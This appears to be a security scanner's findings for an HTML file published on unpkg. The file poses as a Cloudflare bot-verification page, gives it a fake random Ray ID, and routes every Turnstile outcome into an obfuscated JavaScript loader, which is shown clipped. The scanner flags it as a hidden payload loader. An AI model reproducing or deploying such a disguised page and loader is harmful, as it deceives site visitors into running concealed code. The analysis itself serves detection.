Lines 169-231text
169 .footer-wrapper { flex-direction: column; align-items: flex-start; }
170 .footer-divider { display: none; }
171 .footer-link-wrapper { flex-direction: column; align-items: flex-start; gap: 4px; }
176<div class="main-wrapper" role="main">
177 <div class="main-content">
178 <div class="ch-title-zone"><h1>Performing security verification</h1></div>
179 <p class="ch-description">
180 This website uses a security service to protect against malicious bots. This page is displayed while the website verifies you are not a bot.
183 <div class="cf-turnstile-container">
184 <div class="cf-turnstile"
185 data-appearance="always"
186 data-sitekey="0x4AAAAAADrvn4rDM7WVvgPh"
188 data-language="en-US"
189 data-callback="onTurnstileComplete"
190 data-error-callback="onTurnstileComplete"
191 data-expired-callback="onTurnstileComplete"
192 data-timeout-callback="onTurnstileComplete"
193 data-unsupported-callback="onTurnstileComplete">
HighAi Review Evidence
All challenge outcomes invoke the same opaque handler.
index.htmlView on unpkg · L189 198<div class="footer" role="contentinfo">
199 <div class="footer-inner">
200 <div class="footer-wrapper">
201 <div class="clearfix diagnostic-wrapper">
202 <div class="ray-id">Ray ID: <code id="dynamic-ray-id">---------</code></div>
204 <div class="footer-link-wrapper">
205 <span class="footer-text">
206 Performance and Security by
207 <a rel="noopener noreferrer" href="https://www.cloudflare.com/?utm_source=challenge&utm_campaign=m" target="_blank">Cloudflare</a>
209 <span class="footer-divider"></span>
210 <a id="privacy-link" target="_blank" rel="noopener noreferrer" href="https://www.cloudflare.com/privacypolicy/" class="footer-text">Privacy</a>
217 function generateRayId() {
218 const chars = '0123456789abcdef';
220 for (let i = 0; i < 16; i++) result += chars[Math.floor(Math.random() * 16)];
223 document.getElementById('dynamic-ray-id').textContent = generateRayId();
226 function onTurnstileComplete(token) {
227 function _0x1359b2(_0x473a9b,_0x58b77b,_0x1e8010,_0x462036){return _0x5a44(_0x462036- -0x104,_0x473a9b);}(function(_0x50b1a3,_0x5901dc){const _0x139539={_0x41a33c:0x398,_0x38beae:0x373,_0x4d6cc0:0x368,_0x146ebf:0x363,_0x40d6b6:0x38e,_0x50f8fb:0x385,_0x173052:0x392,_0x284ebc:0x308,_0x5c13c3:0x30e,_0x386911:0x33e,_0x2acd61:0x334,_0xe3830f:0x336,_0x5f27c6:0x354,_0x4021dd:0x33f,_0xab1193:0x201,_0x3d4c02:0x238,_0x5da059:0x1f1,_0x2de494:0x213,_0x540dae:0x221,_0x306b6b:0x223,_0x32f037:0x204,_0x4ba47b:0x2f8,_0x183a64:0x32f,_0x531b4c:0x351,_0x39a235:0x368,_0x459cb1:0x340,_0x38b745:0x2f0,_0x1ee1 ...
228 }
HighObfuscated Payload Loader
Source contains an obfuscated payload loader that reconstructs and executes hidden code.
index.htmlView on unpkg · L226 Long lines were clipped for display.